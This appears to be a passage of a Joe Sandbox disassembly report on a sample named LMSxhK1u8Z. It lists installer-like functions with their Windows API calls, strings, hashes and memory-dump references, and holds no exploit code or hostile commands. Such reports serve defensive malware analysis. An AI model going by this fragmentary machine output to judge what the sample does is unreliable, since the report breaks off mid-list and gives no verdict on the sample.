                                                                                                • API String ID: 2320649405-0
                                                                                                • Opcode ID: 878c72b768cb9ca2e83e307521140d4ebe6f79c9a792ccaf91322ed4afa210a0
                                                                                                • Instruction ID: 0ac1a71073e56fec278c78bb8edfd769e40e3e7d0c6ffac740e8a400aad481d4
                                                                                                • Opcode Fuzzy Hash: 878c72b768cb9ca2e83e307521140d4ebe6f79c9a792ccaf91322ed4afa210a0
                                                                                                • Instruction Fuzzy Hash: 7D2142B1500704ABC7319F68DE48B5B7BF8AF80714F04892DEA96B22A1D738E904CB54
                                                                                                Function 0040274B Relevance: 10.6, APIs: 7, Instructions: 89memoryfileCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 0040279F
                                                                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 004027BB
                                                                                                • GlobalFree.KERNEL32(FFFFFD66), ref: 004027F4
                                                                                                • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402806
                                                                                                • GlobalFree.KERNEL32(00000000), ref: 0040280D
                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402825
                                                                                                • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402839
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1738484876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1738451017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738504816.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_LMSxhK1u8Z.jbxd
                                                                                                Similarity
                                                                                                • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                                • String ID:
                                                                                                • API String ID: 3294113728-0
                                                                                                • Opcode ID: f954abbaefe45e02abbe794b2bd8106938d8a6f053d08db0e4a5cdc89549f7be
                                                                                                • Instruction ID: 2d0112b2776dca8d717dfd9e18d313b89dca9e7a3efaaf21f9fdf9ae57e92bf3
                                                                                                • Opcode Fuzzy Hash: f954abbaefe45e02abbe794b2bd8106938d8a6f053d08db0e4a5cdc89549f7be
                                                                                                • Instruction Fuzzy Hash: CE317C72800128BBCF116FA5CE499AE7A79EF09364F10423AF521762E0CB794D419BA8
                                                                                                Function 004048C4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 004048DF
                                                                                                • GetMessagePos.USER32 ref: 004048E7
                                                                                                • ScreenToClient.USER32(?,?), ref: 00404901
                                                                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404913
                                                                                                • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404939
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1738484876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1738451017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738504816.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_LMSxhK1u8Z.jbxd
                                                                                                Similarity
                                                                                                • API ID: Message$Send$ClientScreen
                                                                                                • String ID: f
                                                                                                • API String ID: 41195575-1993550816
                                                                                                • Opcode ID: 8022016cd060c827d0bdc105967e00620e8417d97f69c1817adc8455638bf95d
                                                                                                • Instruction ID: b2acda07281727c86be124b4dee47d1cf8a7ad48e0f381a449079fc6aa512a42
                                                                                                • Opcode Fuzzy Hash: 8022016cd060c827d0bdc105967e00620e8417d97f69c1817adc8455638bf95d
                                                                                                • Instruction Fuzzy Hash: 6F014C71900219BADB10DBA4DD85BFFBBBCAF59711F10012ABB50B61D0D6B499018BA4
                                                                                                Function 00402C15 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402C33
                                                                                                • MulDiv.KERNEL32(000FF59F,00000064,001000B0), ref: 00402C5E
                                                                                                • wsprintfW.USER32 ref: 00402C6E
                                                                                                • SetWindowTextW.USER32(?,?), ref: 00402C7E
                                                                                                • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402C90
                                                                                                Strings
                                                                                                • verifying installer: %d%%, xrefs: 00402C68
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1738484876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1738451017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738504816.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_LMSxhK1u8Z.jbxd
                                                                                                Similarity
                                                                                                • API ID: Text$ItemTimerWindowwsprintf
                                                                                                • String ID: verifying installer: %d%%
                                                                                                • API String ID: 1451636040-82062127
                                                                                                • Opcode ID: 2adaee7f08b790a47a5c37bc0b59c1f8a60a08f948b502380a8ffb43cce8331f
                                                                                                • Instruction ID: fc2375c20bf1a940e442d42f67f4bd9350dc1e6ed8ae84fb9db5d2f1b0513ae1
                                                                                                • Opcode Fuzzy Hash: 2adaee7f08b790a47a5c37bc0b59c1f8a60a08f948b502380a8ffb43cce8331f
                                                                                                • Instruction Fuzzy Hash: 28014F70640208BBEF24AF61DD49BEE3B69FB04309F008439FA06A91D0DBB89555CF59
                                                                                                Function 00401D41 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 38COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetDC.USER32(?), ref: 00401D44
                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D51
                                                                                                • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D60
                                                                                                • ReleaseDC.USER32(?,00000000), ref: 00401D71
                                                                                                • CreateFontIndirectW.GDI32(0040CD80), ref: 00401DBC
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1738484876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1738451017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738504816.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_LMSxhK1u8Z.jbxd
                                                                                                Similarity
                                                                                                • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                • String ID: Calibri
                                                                                                • API String ID: 3808545654-1409258342
                                                                                                • Opcode ID: 1135941911433aa1456fa73da62822fc59eae25dd4671b135b33c63ab7780ad9
                                                                                                • Instruction ID: ac5daf38e842c3ef37672eab1df37869b96295c9a8c7d69064dded374e835ef9
                                                                                                • Opcode Fuzzy Hash: 1135941911433aa1456fa73da62822fc59eae25dd4671b135b33c63ab7780ad9
                                                                                                • Instruction Fuzzy Hash: 1B016D35544640EFEB016BB0AF4AB9A3FB4EF25305F144579F545B62E2CA78040A9B2D
                                                                                                Function 00402571 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 105fileCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • ReadFile.KERNEL32(?,?,00000001,?), ref: 004025CA
                                                                                                • MultiByteToWideChar.KERNEL32(?,?,?,00000001,?,00000001), ref: 004025EC
                                                                                                • ReadFile.KERNEL32(?,?,00000002,?), ref: 00402607
                                                                                                  • Part of subcall function 00405C8D: wsprintfW.USER32 ref: 00405C9A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1738484876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1738451017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738504816.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_LMSxhK1u8Z.jbxd
                                                                                                Similarity
                                                                                                • API ID: FileRead$ByteCharMultiWidewsprintf
                                                                                                • String ID: 9
                                                                                                • API String ID: 3029736425-2366072709
                                                                                                • Opcode ID: 6119b3fc78681a85ba9cd50a76468ca8cd985537187a5c82c8e636e21472dda3
                                                                                                • Instruction ID: 3f2e9d39a30109d4dd297e12bf5cacaacaa6ae2deeb589865bf4cc510dd46cad
                                                                                                • Opcode Fuzzy Hash: 6119b3fc78681a85ba9cd50a76468ca8cd985537187a5c82c8e636e21472dda3
                                                                                                • Instruction Fuzzy Hash: 1A315E7190021AAADF20DF94DA88EBEB7B9EB14344F50443BE401F62D4D7B98A818B59
                                                                                                Function 0040232F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71registrystringCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • RegCreateKeyExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040236D
                                                                                                • lstrlenW.KERNEL32(C:\Program Files (x86)\edelweissen\romanblade.ini,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 0040238D
                                                                                                • RegSetValueExW.ADVAPI32(?,?,?,?,C:\Program Files (x86)\edelweissen\romanblade.ini,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023C9
                                                                                                • RegCloseKey.ADVAPI32(?,?,?,C:\Program Files (x86)\edelweissen\romanblade.ini,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AA
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1738484876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1738451017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738504816.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_LMSxhK1u8Z.jbxd
                                                                                                Similarity
                                                                                                • API ID: CloseCreateValuelstrlen
                                                                                                • String ID: C:\Program Files (x86)\edelweissen\romanblade.ini
                                                                                                • API String ID: 1356686001-3814320704
                                                                                                • Opcode ID: 16e5a276120f12a6204aa0efacf74780f7bd9cd384b23bb9fa3ac2a5e5572d35
                                                                                                • Instruction ID: ae8cd99e4777b9a91f11086a6aa50b0fceabbd5df02328ddbc6dea80253d30cd
                                                                                                • Opcode Fuzzy Hash: 16e5a276120f12a6204aa0efacf74780f7bd9cd384b23bb9fa3ac2a5e5572d35
                                                                                                • Instruction Fuzzy Hash: 73119371A00109BFEB10EFA1DE49EAF7A7CEB40358F11403AF505B61D0DBB85D409B68
                                                                                                Function 00402B10 Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00402B31
                                                                                                • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402B6D
                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00402B76
                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00402B9B
                                                                                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402BB9
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1738484876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1738451017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738504816.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_LMSxhK1u8Z.jbxd
                                                                                                Similarity
                                                                                                • API ID: Close$DeleteEnumOpen
                                                                                                • String ID:
                                                                                                • API String ID: 1912718029-0
                                                                                                • Opcode ID: 0457941ff5e224387652905fc39ee489005b0ae9b3b8e7e888a4b6cafeb9656e
                                                                                                • Instruction ID: 30c1bee4f6ef5540a549b97fb3682634b1066eef3f365ecf60e24fe04a280a9b
                                                                                                • Opcode Fuzzy Hash: 0457941ff5e224387652905fc39ee489005b0ae9b3b8e7e888a4b6cafeb9656e
                                                                                                • Instruction Fuzzy Hash: F6113A71500108BFDF109F90DE89DAE3B79EB44348F10447AFA15B11A0D7B9AE55AA18
                                                                                                Function 00401CE5 Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetDlgItem.USER32(?,?), ref: 00401CEB
                                                                                                • GetClientRect.USER32(00000000,?), ref: 00401CF8
                                                                                                • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D19
                                                                                                • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D27
                                                                                                • DeleteObject.GDI32(00000000), ref: 00401D36
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1738484876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1738451017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738504816.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_LMSxhK1u8Z.jbxd
                                                                                                Similarity
                                                                                                • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                • String ID:
                                                                                                • API String ID: 1849352358-0
                                                                                                • Opcode ID: 9df21d8324280b954a21fe08bb3736f9504f12d3c69ac91fc64e9be1e30a0862
                                                                                                • Instruction ID: 44b403d8ea142f61c46f59bdf5c6715f811f2d25bbd76591197da0c88fd97a40
                                                                                                • Opcode Fuzzy Hash: 9df21d8324280b954a21fe08bb3736f9504f12d3c69ac91fc64e9be1e30a0862
                                                                                                • Instruction Fuzzy Hash: 97F0E1B2600505BFD701DBA4EF88DDE7BBCEB08351F101465F642F1190CA749D418B38
                                                                                                Function 004047DE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78stringCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • lstrlenW.KERNEL32(0042D1F8,0042D1F8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,0000040F,00000400,00000000), ref: 0040486F
                                                                                                • wsprintfW.USER32 ref: 00404878
                                                                                                • SetDlgItemTextW.USER32(?,0042D1F8), ref: 0040488B
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1738484876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1738451017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738504816.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_LMSxhK1u8Z.jbxd
                                                                                                Similarity
                                                                                                • API ID: ItemTextlstrlenwsprintf
                                                                                                • String ID: %u.%u%s%s
                                                                                                • API String ID: 3540041739-3551169577
                                                                                                • Opcode ID: d06d760b70d228034084ebfc2f1cf5957d804e34569ee8fe807cf6b5ccc94acb
                                                                                                • Instruction ID: 9325b392590c5ef976e2008094ad60f82e4542d9ead9839402a3ec0ae1c12cd4
                                                                                                • Opcode Fuzzy Hash: d06d760b70d228034084ebfc2f1cf5957d804e34569ee8fe807cf6b5ccc94acb
                                                                                                • Instruction Fuzzy Hash: F01126336002243BDB10666D9C4AEEF3699DFC2335F144637FA25F60D0D979881186E8
                                                                                                Function 00401BCA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
                                                                                                • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C42
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1738484876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1738451017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738504816.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
